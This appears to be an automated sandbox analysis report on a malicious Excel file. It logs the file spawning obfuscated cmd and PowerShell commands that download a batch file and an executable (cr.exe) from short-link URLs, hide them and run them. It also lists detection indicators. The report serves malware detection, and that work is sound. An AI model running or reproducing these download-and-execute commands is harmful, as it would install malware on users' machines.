Source: ul9kpUwYel.xls Virustotal: Detection: 41%
Source: ul9kpUwYel.xls Metadefender: Detection: 22%
Source: ul9kpUwYel.xls ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: unknown Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
PE file contains sections with non-standard names
Source: sqlite3.dll.24.dr Static PE information: section name: /4
Source: sqlite3.dll.24.dr Static PE information: section name: /19
Source: sqlite3.dll.24.dr Static PE information: section name: /31
Source: sqlite3.dll.24.dr Static PE information: section name: /45
Source: sqlite3.dll.24.dr Static PE information: section name: /57
Source: sqlite3.dll.24.dr Static PE information: section name: /70
Source: sqlite3.dll.24.dr Static PE information: section name: /81
Source: sqlite3.dll.24.dr Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00467460 push eax; ret 24_2_0046747E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004674C1 push eax; ret 24_2_004674B6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00467480 push eax; ret 24_2_004674B6
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FA71 push ecx; ret 24_2_0043FA84
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FC66 push ecx; ret 24_2_0043FC79
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0046FED8 pushad ; retf 0046h 24_2_0046FEE1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00222AA1 push es; retf 24_2_00222AA5
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0022502A push esi; ret 24_2_0022502E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00223605 push 00000004h; iretd 24_2_0022360C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00223E89 push eax; retf 24_2_00223E8A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D76B0 push eax; ret 24_2_002D76CE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002D76D0 push eax; ret 24_2_002D7706
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AFCC1 push ecx; ret 24_2_002AFCD4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_047F350A push ss; iretd 24_2_047F3624
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_047F312B push ss; ret 24_2_047F3135
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cr.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0043ED22
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
